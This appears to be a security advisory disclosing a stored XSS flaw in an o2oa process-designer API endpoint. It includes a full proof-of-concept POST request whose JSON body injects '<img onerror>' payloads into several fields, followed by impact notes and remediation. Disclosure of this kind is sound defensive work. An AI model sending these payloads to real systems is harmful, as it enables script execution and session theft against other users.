Description
Stored XSS in /x_processplatform_assemble_designer/jaxrs/process in o2oa ≤ 10.0-410-g3d5e0d2
Summary
In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_processplatform_assemble_designer/jaxrs/process is vulnerable to stored cross-site scripting (XSS). The vulnerability exists because user-supplied input, such as personal profile fields, is stored without sanitization and later rendered in the application without output encoding, allowing persistent execution of malicious scripts.
Exploitation
POC:
POST /x_processplatform_assemble_designer/jaxrs/process?v=develop-10.0-410-3d5e0d2&mehus0es HTTP/1.1
Host: localhost
Referer: http://localhost/x_desktop/index.html
Sec-Fetch-Site: same-origin
Content-Type: application/json; charset=UTF-8
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G23x52vSQNyKzvPAekU6E6zc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/json,*/*
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Authorization: Wrr7kmtfAdF_VIsbJE2G23x52vSQNyKzvPAekU6E6zc
sec-ch-ua-mobile: ?0
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Content-Length: 3591
{
"name": "\"><img src=1 onerror=alert('hacker')>",
"alias": "\"><img src=1 onerror=alert('hacker')>",
"description": "\"><img src=1 onerror=alert('hacker')>",
"application": "9fce716a-d406-40b8-9b79-7b636bd12cda",
"creatorPerson": "",
"createTime": "2025-08-19 09:19:19",
"lastUpdatePerson": "",
"lastUpdateTime": "",
"id": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
"autoList": [],
"begin": {
"process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
"name": "开始",
"alias": "",
"description": "",
"position": "200,60",
"route": "984b67f5-77bb-46c8-bc8d-ac41250708bd",
"id": "85676808-b46e-4758-a8bd-e38c5cd15d42",
"createTime": "2025-08-19 09:19:17",
"type": "begin",
"readIdentityList": [],
"readDepartmentList": [],
"readScript": "",
"readScriptText": "",
"reviewIdentityList": [],
"reviewDepartmentList": [],
"reviewScript": "",
"reviewScriptText": "",
"beforeArriveScript": "",
"afterArriveScript": "",
"beforeExecuteScript": "",
"afterExecuteScript": "",
"afterInquiryScript": "",
"edition": "CB5289B9D2B000019433D4C015A0B020",
"updateTime": "2025-08-19 09:19:17"
},
"conditionList": [],
"choiceList": [],
"parallelList": [],
"embedList": [],
"publishList": [],
"endList": [
{
"id": "6b79c09a-8fda-4817-acda-a7c0f8622704",
"process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
"name": "结束",
"alias": "",
"description": "",
"position": "200,330",
"createTime": "2025-08-19 09:19:17",
"type": "end",
"readIdentityList": [],
"readDepartmentList": [],
"readScript": "",
"readScriptText": "",
"reviewIdentityList": [],
"reviewDepartmentList": [],
"reviewScript": "",
"reviewScriptText": "",
"beforeArriveScript": "",
"afterArriveScript": "",
"beforeExecuteScript": "",
"afterExecuteScript": "",
"edition": "CB5289B9D2E00001C353E2D01FB09320",
"updateTime": "2025-08-19 09:19:17",
"routeList": []
}
],
"invokeList": [],
"manualList": [],
"mergeList": [],
"routeList": [
{
"id": "984b67f5-77bb-46c8-bc8d-ac41250708bd",
"createTime": "2025-08-19 09:19:19",
"updateTime": "2025-08-19 09:19:19",
"process": "46974d2c-86d4-45c9-8a01-26744e1d5b08",
"activityType": "end",
"activity": "6b79c09a-8fda-4817-acda-a7c0f8622704",
"name": "开始",
"alias": "",
"description": "",
"track": "",
"routeScriptIdList": [],
"position": "",
"edition": "CB5289BA49700001128A17F136D117FC"
}
],
"splitList": [],
"cancelList": [],
"managerIdentityList": [],
"reviewIdentityList": [],
"startableIdentityList": [],
"startableDepartmentList": [],
"startableCompanyList": [],
"beforeBeginScript": "",
"beforeBeginScriptText": "",
"afterBeginScript": "",
"afterBeginScriptText": "",
"beforeEndScript": "",
"beforeEndScriptText": "",
"afterEndScript": "",
"afterEndScriptText": "",
"categoryName": "",
"expireType": "never",
"expireDay": "7",
"expireHour": "0",
"expireWorkTime": true,
"isNewProcess": true,
"projectionData": null,
"applicationName": "\"><img src=1 onerror=alert(1)>",
"category": "",
"routeNameAsOpinion": false,
"startableTerminal": "all",
"defaultStartMode": "instance",
"checkDraft": false,
"serialPhase": "arrive",
"projectionFully": true,
"updateTableEnable": false,
"dataTraceFieldType": "none",
"serialTexture": "[]",
"updateTime": "2025-08-19 09:19:19"
}

When the profile is viewed, the stored payload is executed, confirming the stored XSS.
Impact
-
Persistent JavaScript execution in victim browsers
-
Possible theft of session tokens or sensitive user data
-
Unauthorized actions performed on behalf of authenticated users
Remediation
Validate and escape user input in profile fields before storage, and apply context-appropriate output encoding (for example, HTML entity encoding) when rendering stored data.